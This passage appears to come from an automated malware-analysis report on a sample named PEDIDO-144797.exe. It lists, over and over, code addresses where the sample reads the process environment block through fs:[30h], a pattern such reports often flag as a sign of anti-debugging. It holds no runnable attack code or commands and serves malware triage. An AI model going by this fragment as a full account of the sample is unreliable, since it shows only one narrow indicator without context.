        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274F0A5 mov eax, dword ptr fs:[00000030h]2_2_3274F0A5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275B0AF mov eax, dword ptr fs:[00000030h]2_2_3275B0AF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774080 mov eax, dword ptr fs:[00000030h]2_2_32774080
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269C090 mov eax, dword ptr fs:[00000030h]2_2_3269C090
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A093 mov ecx, dword ptr fs:[00000030h]2_2_3269A093
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D716D mov eax, dword ptr fs:[00000030h]2_2_326D716D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A6179 mov eax, dword ptr fs:[00000030h]2_2_326A6179
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F717A mov eax, dword ptr fs:[00000030h]2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326F717A mov eax, dword ptr fs:[00000030h]2_2_326F717A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32773157 mov eax, dword ptr fs:[00000030h]2_2_32773157
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269A147 mov eax, dword ptr fs:[00000030h]2_2_3269A147
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D415F mov eax, dword ptr fs:[00000030h]2_2_326D415F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3273314A mov eax, dword ptr fs:[00000030h]2_2_3273314A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32775149 mov eax, dword ptr fs:[00000030h]2_2_32775149
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272A130 mov eax, dword ptr fs:[00000030h]2_2_3272A130
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7128 mov eax, dword ptr fs:[00000030h]2_2_326D7128
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D7128 mov eax, dword ptr fs:[00000030h]2_2_326D7128
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F13E mov eax, dword ptr fs:[00000030h]2_2_3275F13E
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C510F mov eax, dword ptr fs:[00000030h]2_2_326C510F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A510D mov eax, dword ptr fs:[00000030h]2_2_326A510D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0118 mov eax, dword ptr fs:[00000030h]2_2_326D0118
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269F113 mov eax, dword ptr fs:[00000030h]2_2_3269F113
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326981EB mov eax, dword ptr fs:[00000030h]2_2_326981EB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AA1E3 mov eax, dword ptr fs:[00000030h]2_2_326AA1E3
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CB1E0 mov eax, dword ptr fs:[00000030h]2_2_326CB1E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A91E5 mov eax, dword ptr fs:[00000030h]2_2_326A91E5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A91E5 mov eax, dword ptr fs:[00000030h]2_2_326A91E5
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327681EE mov eax, dword ptr fs:[00000030h]2_2_327681EE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327681EE mov eax, dword ptr fs:[00000030h]2_2_327681EE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326991F0 mov eax, dword ptr fs:[00000030h]2_2_326991F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326991F0 mov eax, dword ptr fs:[00000030h]2_2_326991F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B01F1 mov eax, dword ptr fs:[00000030h]2_2_326B01F1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B01F1 mov eax, dword ptr fs:[00000030h]2_2_326B01F1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B01F1 mov eax, dword ptr fs:[00000030h]2_2_326B01F1
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF1F0 mov eax, dword ptr fs:[00000030h]2_2_326CF1F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CF1F0 mov eax, dword ptr fs:[00000030h]2_2_326CF1F0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B01C0 mov eax, dword ptr fs:[00000030h]2_2_326B01C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B01C0 mov eax, dword ptr fs:[00000030h]2_2_326B01C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B51C0 mov eax, dword ptr fs:[00000030h]2_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B51C0 mov eax, dword ptr fs:[00000030h]2_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B51C0 mov eax, dword ptr fs:[00000030h]2_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B51C0 mov eax, dword ptr fs:[00000030h]2_2_326B51C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327751B6 mov eax, dword ptr fs:[00000030h]2_2_327751B6
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE1A4 mov eax, dword ptr fs:[00000030h]2_2_326DE1A4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DE1A4 mov eax, dword ptr fs:[00000030h]2_2_326DE1A4
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D31BE mov eax, dword ptr fs:[00000030h]2_2_326D31BE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D31BE mov eax, dword ptr fs:[00000030h]2_2_326D31BE
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D41BB mov ecx, dword ptr fs:[00000030h]2_2_326D41BB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D41BB mov eax, dword ptr fs:[00000030h]2_2_326D41BB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D41BB mov eax, dword ptr fs:[00000030h]2_2_326D41BB
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A4180 mov eax, dword ptr fs:[00000030h]2_2_326A4180
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A4180 mov eax, dword ptr fs:[00000030h]2_2_326A4180
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A4180 mov eax, dword ptr fs:[00000030h]2_2_326A4180
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C9194 mov eax, dword ptr fs:[00000030h]2_2_326C9194
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1190 mov eax, dword ptr fs:[00000030h]2_2_326E1190
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1190 mov eax, dword ptr fs:[00000030h]2_2_326E1190
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D666D mov esi, dword ptr fs:[00000030h]2_2_326D666D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D666D mov eax, dword ptr fs:[00000030h]2_2_326D666D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D666D mov eax, dword ptr fs:[00000030h]2_2_326D666D
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32697662 mov eax, dword ptr fs:[00000030h]2_2_32697662
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32697662 mov eax, dword ptr fs:[00000030h]2_2_32697662
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32697662 mov eax, dword ptr fs:[00000030h]2_2_32697662
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B3660 mov eax, dword ptr fs:[00000030h]2_2_326B3660
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B3660 mov eax, dword ptr fs:[00000030h]2_2_326B3660
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B3660 mov eax, dword ptr fs:[00000030h]2_2_326B3660
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A0670 mov eax, dword ptr fs:[00000030h]2_2_326A0670
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2670 mov eax, dword ptr fs:[00000030h]2_2_326E2670
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E2670 mov eax, dword ptr fs:[00000030h]2_2_326E2670
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D64A mov eax, dword ptr fs:[00000030h]2_2_3269D64A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3269D64A mov eax, dword ptr fs:[00000030h]2_2_3269D64A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A3640 mov eax, dword ptr fs:[00000030h]2_2_326A3640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF640 mov eax, dword ptr fs:[00000030h]2_2_326BF640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF640 mov eax, dword ptr fs:[00000030h]2_2_326BF640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326BF640 mov eax, dword ptr fs:[00000030h]2_2_326BF640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DC640 mov eax, dword ptr fs:[00000030h]2_2_326DC640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DC640 mov eax, dword ptr fs:[00000030h]2_2_326DC640
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A965A mov eax, dword ptr fs:[00000030h]2_2_326A965A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A965A mov eax, dword ptr fs:[00000030h]2_2_326A965A
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D265C mov eax, dword ptr fs:[00000030h]2_2_326D265C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D265C mov ecx, dword ptr fs:[00000030h]2_2_326D265C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D265C mov eax, dword ptr fs:[00000030h]2_2_326D265C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D5654 mov eax, dword ptr fs:[00000030h]2_2_326D5654
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32728633 mov esi, dword ptr fs:[00000030h]2_2_32728633
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32728633 mov eax, dword ptr fs:[00000030h]2_2_32728633
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32728633 mov eax, dword ptr fs:[00000030h]2_2_32728633
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A5622 mov eax, dword ptr fs:[00000030h]2_2_326A5622
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A5622 mov eax, dword ptr fs:[00000030h]2_2_326A5622
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A7623 mov eax, dword ptr fs:[00000030h]2_2_326A7623
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DC620 mov eax, dword ptr fs:[00000030h]2_2_326DC620
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DF63F mov eax, dword ptr fs:[00000030h]2_2_326DF63F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326DF63F mov eax, dword ptr fs:[00000030h]2_2_326DF63F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274D62C mov ecx, dword ptr fs:[00000030h]2_2_3274D62C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274D62C mov ecx, dword ptr fs:[00000030h]2_2_3274D62C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274D62C mov eax, dword ptr fs:[00000030h]2_2_3274D62C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A0630 mov eax, dword ptr fs:[00000030h]2_2_326A0630
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0630 mov eax, dword ptr fs:[00000030h]2_2_326D0630
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D360F mov eax, dword ptr fs:[00000030h]2_2_326D360F
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CD600 mov eax, dword ptr fs:[00000030h]2_2_326CD600
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CD600 mov eax, dword ptr fs:[00000030h]2_2_326CD600
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F607 mov eax, dword ptr fs:[00000030h]2_2_3275F607
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32774600 mov eax, dword ptr fs:[00000030h]2_2_32774600
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_32733608 mov eax, dword ptr fs:[00000030h]2_2_32733608
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271C6F2 mov eax, dword ptr fs:[00000030h]2_2_3271C6F2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3271C6F2 mov eax, dword ptr fs:[00000030h]2_2_3271C6F2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326996E0 mov eax, dword ptr fs:[00000030h]2_2_326996E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326996E0 mov eax, dword ptr fs:[00000030h]2_2_326996E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326AC6E0 mov eax, dword ptr fs:[00000030h]2_2_326AC6E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A56E0 mov eax, dword ptr fs:[00000030h]2_2_326A56E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A56E0 mov eax, dword ptr fs:[00000030h]2_2_326A56E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A56E0 mov eax, dword ptr fs:[00000030h]2_2_326A56E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C66E0 mov eax, dword ptr fs:[00000030h]2_2_326C66E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326C66E0 mov eax, dword ptr fs:[00000030h]2_2_326C66E0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A06CF mov eax, dword ptr fs:[00000030h]2_2_326A06CF
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3276A6C0 mov eax, dword ptr fs:[00000030h]2_2_3276A6C0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327486C2 mov eax, dword ptr fs:[00000030h]2_2_327486C2
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326CD6D0 mov eax, dword ptr fs:[00000030h]2_2_326CD6D0
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327686A8 mov eax, dword ptr fs:[00000030h]2_2_327686A8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_327686A8 mov eax, dword ptr fs:[00000030h]2_2_327686A8
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3272C691 mov eax, dword ptr fs:[00000030h]2_2_3272C691
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B0680 mov eax, dword ptr fs:[00000030h]2_2_326B0680
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3275F68C mov eax, dword ptr fs:[00000030h]2_2_3275F68C
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A8690 mov eax, dword ptr fs:[00000030h]2_2_326A8690
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326B2760 mov ecx, dword ptr fs:[00000030h]2_2_326B2760
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326E1763 mov eax, dword ptr fs:[00000030h]2_2_326E1763
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A4779 mov eax, dword ptr fs:[00000030h]2_2_326A4779
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326A4779 mov eax, dword ptr fs:[00000030h]2_2_326A4779
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_326D0774 mov eax, dword ptr fs:[00000030h]2_2_326D0774
        Source: C:\Users\user\Desktop\PEDIDO-144797.exeCode function: 2_2_3274E750 mov eax, dword ptr fs:[00000030h]2_2_3274E750
